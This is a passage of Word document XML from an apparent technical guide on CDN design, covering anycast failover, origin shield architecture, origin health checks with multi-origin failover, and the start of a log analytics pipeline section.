        <w:t>Each PoP operates multiple servers with identical software and cache contents (approximately — cache divergence is acceptable). A server failure affects a fraction of the PoP's capacity, not the entire PoP. Load balancers (L4, hardware-based) distribute connections across healthy servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CB8BE2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anycast failover:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C24866" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>If an entire PoP fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56604F17" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>The PoP's BGP sessions to upstream providers terminate (or are explicitly withdrawn).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C6FD9F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Upstream providers withdraw routes to the Anycast prefix via the failed PoP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC958D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>BGP reconverges (30–120 seconds globally).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7002256D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Traffic to the Anycast IP is automatically rerouted to the next-best PoP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D62B352" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>New connections go to the healthy PoP. Existing TCP connections are broken (require reconnection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8619D7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cold cache problem after failover:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A5121" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>When traffic reroutes to a new PoP (which doesn't have the failed PoP's cache contents), cache hit rate drops significantly. The new PoP must warm its cache by fetching content from origin — temporarily increasing origin load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20273AED" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> The tiered architecture naturally handles this. Even if an edge PoP's cache is cold, the regional PoP above it likely has the content cached. The regional PoP serves as the fallback, preventing a wave of traffic from reaching origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0C6B12" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Origin Protection — Shield Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23744445" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The origin shield pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6BBD6B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>All CDN edge PoPs funnel their cache misses through a small number of designated </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>origin shield PoPs</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> before reaching origin. The origin only needs to handle traffic from the shield PoPs — not from thousands of edge PoPs directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464E8E1C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAE92A6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>5,000 edge PoPs → 10 shield PoPs → Origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3CD947" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="2B682CA5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin connections: 10 (from shield PoPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56858417" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>vs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B295180" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Without shielding: 5,000 connections from edge PoPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2891F6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E746AE0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection count reduction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Origin doesn't need to maintain thousands of persistent connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1334EB6B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache deduplication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> A popular item is cached at each shield PoP — edge misses within a shield's region hit the shield cache, not origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70382BC1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Origin DDoS protection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Even if the CDN is somehow bypassed, the shield acts as an additional layer. Attackers must compromise the shield to reach origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F37AAF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent origin routing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> All requests to origin come from known shield IPs. Origin can allowlist shield IPs and block all other traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B650E2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shield selection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6549C89D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The optimal shield location for a given origin minimizes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA2190F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1229"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Latency from shield to origin (network proximity to origin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A82F1E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1229"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Number of shield-to-origin requests (shield cache hit rate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A243D22" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1229"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Latency from edge PoPs to shield (shield should be reachable quickly from all edge PoPs it serves).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4A13C6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cloudflare, Fastly, and Akamai all have dedicated shield networks separate from their edge PoPs — strategically placed at internet backbone interconnection points to minimize latency to both edge PoPs and customer origins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E56546" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Health Checks and Failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B202C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active health checks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BE07A3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>CDN edges continuously probe origin servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F37AEE9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463E1169" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Every 10 seconds: GET /health HTTP/1.1 from each edge PoP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562ED138" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Expected: 200 OK within 5 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D36A5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="44C647F6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Failure conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C3710D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>- Response status != 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D4BA8B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>- Response time &gt; 5 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D053087" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>- TCP connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B237035" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>- DNS resolution failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69944777" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The health check state machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886927E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAEEC0D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HEALTHY → 3 consecutive failures → UNHEALTHY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA2875E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>UNHEALTHY → 3 consecutive successes → HEALTHY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682FD00D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="0D4D77B0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>UNHEALTHY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF5632A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Route traffic to secondary origin (if configured)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EA465C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Serve stale cached content (stale-if-error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D99F3E4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Return 503 with Retry-After (if no fallback available)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562E3BB5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-origin failover:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B56C57" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A1A6D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Primary origin: api.example.com:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A492C0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Secondary origin: api-backup.example.com:443  (different cloud region)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9EB0B4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="41EDEB3E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F667B1E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Normally: route to primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E26AE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  If primary fails health check: route to secondary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6ED9EB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  If both fail: serve stale cache content for up to 24 hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AAFE31" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  If cache also expired: return 503</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE64DE8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The secondary origin is typically in a different cloud region or availability zone — isolated from the primary's failure domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30478849" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="7F107941">
          <v:rect id="_x0000_i4556" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43443701" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. CDN Analytics and Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFEFD14" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-Time Traffic Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133FA855" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN edges generate enormous volumes of log data — every request produces a log entry. At 10 million requests per second across a CDN, that's 10 million log lines per second — approximately 10 TB/hour of raw logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2983F9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The log pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB898B0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C65860" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN Edge (request handled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F393CCE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ↓ structured log entry (JSON, ~500 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DE9430" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Local log buffer (in-memory ring buffer, ~100ms flush interval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E7B7E6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ↓ batched, compressed (Zstd, ~10:1 compression)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E86D0D2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Log aggregation (Kafka, Kinesis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3505BFBD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ↓ stream processing (Apache Flink, Spark Streaming)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38997905" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Real-time analytics database (ClickHouse, Apache Druid, Pinot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C499F8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ↓ SQL queries for dashboards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B53A12C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Customer analytics dashboard (1–5 minute data freshness)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B0C58" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The structured log record:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F57373" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285AB056" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B9781" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "timestamp": "2024-01-15T10:30:45.123456Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355FF58C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "edge_node": "fra-edge-07",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5BD2DA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  "pop": "Frankfurt",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B4CA9E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "client_ip": "203.0.113.1",</w:t>
      </w:r>
    </w:p>
